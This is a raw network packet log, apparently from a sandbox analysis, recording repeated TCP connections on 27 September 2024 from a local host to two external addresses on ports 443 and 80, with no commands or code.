                                                                                                                                                                Sep 27, 2024 17:42:14.209326982 CEST49757443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.209348917 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.209363937 CEST49757443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.209369898 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.209564924 CEST49758443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.209569931 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.209602118 CEST49758443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.209605932 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.492444038 CEST49760443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.492506981 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.492588043 CEST49760443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.492928982 CEST49760443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.492947102 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.538391113 CEST49761443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.538430929 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.538568974 CEST49761443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.538889885 CEST49761443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.538901091 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.569432974 CEST8049759185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.569647074 CEST4975980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:14.570529938 CEST4975980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:14.575325966 CEST8049759185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.803164005 CEST8049759185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.803297997 CEST4975980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:14.910890102 CEST4975980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:14.911307096 CEST4976280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:14.916249990 CEST8049759185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.916333914 CEST8049762185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.916357040 CEST4975980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:14.916416883 CEST4976280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:14.916593075 CEST4976280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:14.921705008 CEST8049762185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.961797953 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.961886883 CEST49760443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.963229895 CEST49760443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.963248968 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.963608027 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.964513063 CEST49760443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.007425070 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.032973051 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.033092022 CEST49761443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.034593105 CEST49761443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.034605026 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.034883976 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.036075115 CEST49761443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.083416939 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.384988070 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.385109901 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.385262966 CEST49760443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.385564089 CEST49760443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.385624886 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.385659933 CEST49760443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.385675907 CEST44349760172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.436295033 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.436405897 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.436562061 CEST49761443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.437064886 CEST49761443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.437064886 CEST49761443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.437088013 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.437102079 CEST44349761172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.610800028 CEST8049762185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.610868931 CEST4976280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:15.611680984 CEST4976280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:15.616476059 CEST8049762185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.789150953 CEST49763443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.789239883 CEST44349763172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.789347887 CEST49763443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.789691925 CEST49763443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.789721012 CEST44349763172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.839762926 CEST8049762185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.841454983 CEST4976280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:15.870693922 CEST49764443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.870757103 CEST44349764172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.870845079 CEST49764443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.871220112 CEST49764443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:15.871236086 CEST44349764172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.957870960 CEST4976280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:15.958350897 CEST4976580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:15.962876081 CEST8049762185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.962970972 CEST4976280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:15.963115931 CEST8049765185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:15.963195086 CEST4976580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:15.963418007 CEST4976580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:15.968153954 CEST8049765185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.395487070 CEST44349764172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.395545006 CEST44349763172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.395584106 CEST49764443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:16.395648956 CEST49763443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:16.399925947 CEST49763443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:16.399941921 CEST44349763172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.400281906 CEST44349763172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.401021957 CEST49764443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:16.401030064 CEST44349764172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.401354074 CEST44349764172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.401767015 CEST49763443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:16.402403116 CEST49764443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:16.443391085 CEST44349764172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.443393946 CEST44349763172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.650677919 CEST44349764172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.650774956 CEST44349764172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.655263901 CEST49764443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:16.655340910 CEST49764443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:16.655360937 CEST44349764172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.655375957 CEST49764443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:16.655380964 CEST44349764172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.663414001 CEST8049765185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.667294025 CEST4976580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:16.759260893 CEST4976580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:16.764202118 CEST8049765185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.818746090 CEST44349763172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.818856001 CEST44349763172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.819015980 CEST49763443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:16.840097904 CEST49763443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:16.840145111 CEST44349763172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.840166092 CEST49763443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:16.840174913 CEST44349763172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.987288952 CEST8049765185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:16.989701986 CEST4976580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:17.098372936 CEST4976580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:17.098828077 CEST4976680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:17.246130943 CEST49767443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:17.246165037 CEST44349767172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:17.246228933 CEST49767443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:17.246718884 CEST49767443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:17.246738911 CEST44349767172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:17.373845100 CEST8049766185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:17.373929024 CEST4976680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:17.374164104 CEST4976680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:17.375530958 CEST8049765185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:17.375583887 CEST4976580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:17.379009008 CEST8049766185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:17.398678064 CEST49768443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:17.398804903 CEST44349768172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:17.398881912 CEST49768443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:17.399307013 CEST49768443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:17.399343014 CEST44349768172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:17.828440905 CEST44349767172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:17.828528881 CEST49767443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:17.829971075 CEST49767443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:17.829992056 CEST44349767172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:17.830255032 CEST44349767172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:17.831207037 CEST49767443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:17.875400066 CEST44349767172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:17.881442070 CEST44349768172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:17.881551981 CEST49768443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:17.882910013 CEST49768443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:17.882922888 CEST44349768172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:17.883415937 CEST44349768172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:17.884382010 CEST49768443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:17.927447081 CEST44349768172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:18.096131086 CEST8049766185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:18.097867966 CEST4976680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:18.098745108 CEST4976680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:18.103557110 CEST8049766185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:18.244704962 CEST44349767172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:18.244841099 CEST44349767172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:18.245116949 CEST49767443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:18.245511055 CEST49767443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:18.245533943 CEST44349767172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:18.245548010 CEST49767443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:18.245558023 CEST44349767172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:18.302736998 CEST44349768172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:18.302900076 CEST44349768172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:18.302979946 CEST49768443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:18.303344965 CEST49768443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:18.303406000 CEST44349768172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:18.303451061 CEST49768443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:18.303467989 CEST44349768172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:18.329432011 CEST8049766185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:18.329984903 CEST4976680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:18.442508936 CEST4976680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:18.442975044 CEST4976980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:18.447695017 CEST8049766185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:18.447752953 CEST8049769185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:18.447799921 CEST4976680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:18.447885990 CEST4976980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:18.448019028 CEST4976980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:18.452749968 CEST8049769185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:18.589236021 CEST49770443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:18.589333057 CEST44349770172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:18.589443922 CEST49770443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:18.589889050 CEST49770443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:18.589912891 CEST44349770172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:18.616913080 CEST49771443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:18.616964102 CEST44349771172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:18.617039919 CEST49771443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:18.617362976 CEST49771443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:18.617377043 CEST44349771172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.057818890 CEST44349770172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.057898998 CEST49770443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:19.059273958 CEST49770443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:19.059289932 CEST44349770172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.059577942 CEST44349770172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.060276031 CEST49770443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:19.093841076 CEST44349771172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.093945980 CEST49771443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:19.103446007 CEST44349770172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.125655890 CEST49771443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:19.125694036 CEST44349771172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.126144886 CEST44349771172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.126892090 CEST49771443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:19.162811041 CEST8049769185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.162889957 CEST4976980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:19.163757086 CEST4976980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:19.167397022 CEST44349771172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.168536901 CEST8049769185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.395610094 CEST8049769185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.395709991 CEST4976980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:19.500128984 CEST44349770172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.500226021 CEST44349770172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.500283957 CEST49770443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:19.515973091 CEST44349771172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.516072989 CEST44349771172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.516139030 CEST49771443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:19.516822100 CEST49770443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:19.516851902 CEST44349770172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.516865015 CEST49770443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:19.516870975 CEST44349770172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.603893042 CEST4976980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:19.608156919 CEST4977280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:19.609432936 CEST8049769185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.609524012 CEST4976980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:19.613317013 CEST8049772185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.613416910 CEST4977280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:19.691888094 CEST4977280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:19.696846962 CEST8049772185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.766902924 CEST49771443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:19.766942024 CEST44349771172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.766956091 CEST49771443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:19.766963959 CEST44349771172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.992290020 CEST49773443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:19.992331028 CEST44349773172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:19.992418051 CEST49773443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:19.992743015 CEST49773443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:19.992757082 CEST44349773172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.039016008 CEST49774443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:20.039028883 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.039122105 CEST49774443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:20.039503098 CEST49774443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:20.039515018 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.351269007 CEST8049772185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.351329088 CEST4977280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:20.352669954 CEST4977280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:20.358824968 CEST8049772185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.780484915 CEST8049772185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.780563116 CEST4977280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:20.782382965 CEST44349773172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.782479048 CEST49773443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:20.782582998 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.782645941 CEST49774443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:20.783735991 CEST49773443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:20.783745050 CEST44349773172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.783992052 CEST44349773172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.784710884 CEST49773443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:20.784742117 CEST49774443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:20.784746885 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.784981966 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.785687923 CEST49774443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:20.827403069 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.827408075 CEST44349773172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.897715092 CEST4977280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:20.898045063 CEST4977580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:20.906852961 CEST8049775185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.906963110 CEST4977580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:20.907125950 CEST4977580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:20.907171965 CEST8049772185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:20.907226086 CEST4977280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:20.913516998 CEST8049775185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.278204918 CEST44349773172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.278306007 CEST44349773172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.278357029 CEST49773443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.278568029 CEST49773443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.278592110 CEST44349773172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.297646046 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.297745943 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.297787905 CEST49774443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.298091888 CEST49774443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.298106909 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.298135042 CEST49774443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.298140049 CEST44349774172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.523137093 CEST49776443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.523179054 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.523250103 CEST49776443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.523716927 CEST49776443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.523729086 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.649245977 CEST49777443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.649286032 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.649384022 CEST49777443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.649914026 CEST49777443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:21.649924994 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.764983892 CEST8049775185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:21.765044928 CEST4977580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:21.766148090 CEST4977580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:21.774802923 CEST8049775185.215.113.16192.168.2.4
